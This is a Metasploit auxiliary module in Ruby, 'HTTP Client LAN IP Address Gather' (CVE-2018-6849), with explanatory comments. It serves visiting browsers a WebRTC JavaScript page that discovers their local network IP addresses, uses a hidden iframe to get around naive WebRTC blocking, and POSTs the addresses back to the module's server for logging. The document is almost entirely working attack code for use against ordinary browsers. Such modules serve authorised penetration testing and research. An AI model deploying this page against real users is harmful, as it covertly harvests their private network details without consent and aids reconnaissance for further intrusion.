##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  # Module metadata. The module is passive ('PassiveActions' => WebServer):
  # it serves the WebRTC page built in #setup to any browser that visits, and
  # the page reports the addresses it discovers back to this server via POST
  # (handled in #on_request_uri).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTP Client LAN IP Address Gather',
        'Description' => %q{
          This module retrieves a browser's network interface IP addresses
          using WebRTC.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Daniel Roesler', # JS Code
          'Dhiraj Mishra' # MSF Module
        ],
        'References' => [
          [ 'CVE', '2018-6849' ],
          [ 'URL', 'http://net.ipcalf.com/' ],
          [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
        ],
        'DisclosureDate' => '2013-09-05',
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Auxiliary entry point. Delegates to `exploit`, which (per the inline
  # comment) starts the HTTP listener; requests are then dispatched to
  # #on_request_uri.
  def run
    exploit # start http server
  end

  # Builds the page served to clients and caches it in @html.
  #
  # The heredoc is interpolating (`<<~JS` without quotes), so Ruby processes
  # backslash escapes before the string is stored: `\\.` and `'\\n'` below
  # become `\.` and `'\n'` in the JavaScript the browser receives. The
  # heredoc contains no `#{}` interpolation, so nothing request-controlled
  # ends up in the served page.
  #
  # The script discovers local interface addresses from ICE candidates and
  # POSTs each newly seen address back to `window.location`, i.e. to this
  # module's URI.
  def setup
    # code from: https://github.com/diafygi/webrtc-ips
    @html = <<~JS
      <script>
        //get the IP addresses associated with an account
        function getIPs(callback){
          var ip_dups = {};

          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
            || window.mozRTCPeerConnection
            || window.webkitRTCPeerConnection;
          var useWebKit = !!window.webkitRTCPeerConnection;

          //bypass naive webrtc blocking using an iframe
          if(!RTCPeerConnection){
            //NOTE: you need to have an iframe in the page right above the script tag
            //
            //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
            //<script>...getIPs called in here...
            //
            var win = iframe.contentWindow;
            RTCPeerConnection = win.RTCPeerConnection
              || win.mozRTCPeerConnection
              || win.webkitRTCPeerConnection;
            useWebKit = !!win.webkitRTCPeerConnection;
          }

          //minimal requirements for data connection
          var mediaConstraints = {
            optional: [{RtpDataChannels: true}]
          };

          var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

          //construct a new RTCPeerConnection
          var pc = new RTCPeerConnection(servers, mediaConstraints);

          function handleCandidate(candidate){
            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
            var ip_addr = ip_regex.exec(candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
              callback(ip_addr);

            ip_dups[ip_addr] = true;
          }

          //listen for candidate events
          pc.onicecandidate = function(ice){

            //skip non-candidate events
            if(ice.candidate)
              handleCandidate(ice.candidate.candidate);
          };

          //create a bogus data channel
          pc.createDataChannel("");

          //create an offer sdp
          pc.createOffer(function(result){

            //trigger the stun server request
            pc.setLocalDescription(result, function(){}, function(){});

          }, function(){});

          //wait for a while to let everything done
          setTimeout(function(){
            //read candidate info from local description
            var lines = pc.localDescription.sdp.split('\\n');

            lines.forEach(function(line){
              if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
            });
          }, 1000);
        }

        getIPs(function(ip){
          //console.log(ip);
          var xmlhttp = new XMLHttpRequest;
          xmlhttp.open('POST', window.location, true);
          xmlhttp.send(ip);
        });
      </script>
    JS
  end

  # HttpServer callback for every request to the module's URI.
  #
  # GET  -> serve the WebRTC page from @html.
  # POST -> the body is an address reported by the page's getIPs callback.
  #         It is untrusted client input and is only echoed to the console
  #         after matching an anchored (\A ... \z) whole-string pattern, so
  #         arbitrary text cannot reach the log output. The pattern accepts
  #         dotted-quad IPv4 (digit ranges are not bounds-checked) and IPv6
  #         only as eight colon-separated lowercase hex groups; compressed
  #         forms such as "::1" or uppercase hex are reported as malformed.
  # Any other method is logged and ignored.
  #
  # @param cli     the connected client; `peerhost` is used in every log line
  # @param request the parsed HTTP request (`method`, `body`)
  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get'
      # String#size counts characters; the served page is ASCII-only, so this
      # equals the byte count in the message.
      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
      send_response(cli, @html)
    when 'post'
      begin
        ip = request.body
        if ip =~ /\A([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\z/
          print_good("#{cli.peerhost}: Found IP address: #{ip}")
        else
          print_error("#{cli.peerhost}: Received malformed IP address")
        end
      rescue
        # Bare rescue catches StandardError only; the body is dropped rather
        # than printed so nothing unvalidated reaches the console.
        print_error("#{cli.peerhost}: Received malformed reply")
      end
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
end